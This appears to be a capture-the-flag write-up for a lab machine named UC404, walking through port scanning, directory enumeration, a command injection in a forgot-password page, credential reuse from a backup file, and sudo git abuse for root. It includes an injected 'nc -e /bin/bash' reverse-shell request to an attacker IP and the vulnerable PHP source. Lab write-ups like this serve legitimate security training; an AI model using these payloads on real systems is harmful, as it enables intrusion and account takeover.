UC404

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 4000 192.168.202.109
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:34 +08
Nmap scan report for 192.168.202.109
Host is up (0.17s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
41473/tcp open  unknown
45259/tcp open  unknown
49415/tcp open  unknown
54505/tcp open  unknown

NFS is open, which might have stuff we can mount on.

Rabbit Holes

NFS had nothing:

$ showmount -e 192.168.202.109      
Export list for 192.168.202.109:

Port 80 shows some dashboard that looks static:

A detailed nmap scan reveals that there's a .git repository present:

$ sudo nmap -p 80 -sC -sV --min-rate 3000 192.168.202.109
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 21:37 +08
Nmap scan report for 192.168.202.109
Host is up (0.17s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-git: 
|   192.168.202.109:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|       https://github.com/ColorlibHQ/AdminLTE.git
|_    Project type: Ruby on Rails web application (guessed from .gitignore)
|_http-title: AdminLTE 3 | Dashboard

However, there's nothing interesting within it.

Web Enumeration -> Cmd Injection

I ran a gobuster scan on port 80 and found one interesting directory:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.202.109 -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.202.109
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/07/06 21:37:30 Starting gobuster in directory enumeration mode
===============================================================
/pages                (Status: 301) [Size: 318] [--> http://192.168.202.109/pages/]
/demo                 (Status: 301) [Size: 317] [--> http://192.168.202.109/demo/]
/plugins              (Status: 301) [Size: 320] [--> http://192.168.202.109/plugins/]
/docs                 (Status: 301) [Size: 317] [--> http://192.168.202.109/docs/]
/db                   (Status: 301) [Size: 315] [--> http://192.168.202.109/db/]
/dist                 (Status: 301) [Size: 317] [--> http://192.168.202.109/dist/]
/build                (Status: 301) [Size: 318] [--> http://192.168.202.109/build/]
/LICENSE              (Status: 200) [Size: 1082]
/under_construction   (Status: 301) [Size: 331] [--> http://192.168.202.109/under_construction/]

The under_construction part looked the most promising. It just brought us to a login page:

Default credentials don't work with this one. I was a bit stuck here, but eventually decided to check the page source of all pages. There was this interesting bit within the source for the 'Forgot Password' page:

Blacklisting some characters means that there is a potential injection point here. I was curious about that '1' and what it was reflecting. I tested this a bit by sending POST requests, but it didn't really work.

I thought for a while, and decided to change it to GET requests instead of POST, and it actually worked!

We can get a reverse shell by sending this request:

GET /under_construction/forgot.php?email=%0a+nc+-e+/bin/bash+192.168.45.179+21 HTTP/1.1
Host: 192.168.202.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://192.168.202.109
Connection: close
Referer: http://192.168.202.109/under_construction/forgot.php
Upgrade-Insecure-Requests: 1

Super CTF-ish initial access. We can read the source code to see how it works:

<?php
//system("php sendmail.php " . $_GET['email'], $output); print_r($output)
$badUrl = $_GET['email'];
$goodUrl = str_replace(';', '?', $badUrl);
system("php sendmail.php " . $goodUrl, $output); print_r($output);
?>

Privilege Escalation

Brian Creds

I ran a linpeas.sh scan to enumerate for me. It picked up on this:

[+] Backup folders
drwxr-xr-x 2 root root 4096 Jan 27 16:07 /var/backups                                        
total 16
-rw-r--r-- 1 root     root     10832 Oct 27  2020 apt.extended_states.0
-rw-r--r-- 1 www-data www-data   787 Sep 18  2020 sendmail.php.bak

We can read it to find more credentials:

www-data@UC404:/tmp$ cat /var/backups/sendmail.php.bak 
<?php                                                                                        
if(isset($_POST['submit']))                                                                  
{ 
$connect=mysql_connect("localhost","brian","BrianIsOnTheAir789") or die("Could not connect to database");

We can then su to brian:

Sudo Git

Since we had the password, we can check sudo privileges:

brian@UC404:/tmp$ sudo -l
Matching Defaults entries for brian on UC404:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brian may run the following commands on UC404:
    (ALL) NOPASSWD: /usr/bin/git

We can follow GTFOBins to get a root shell:

Rooted!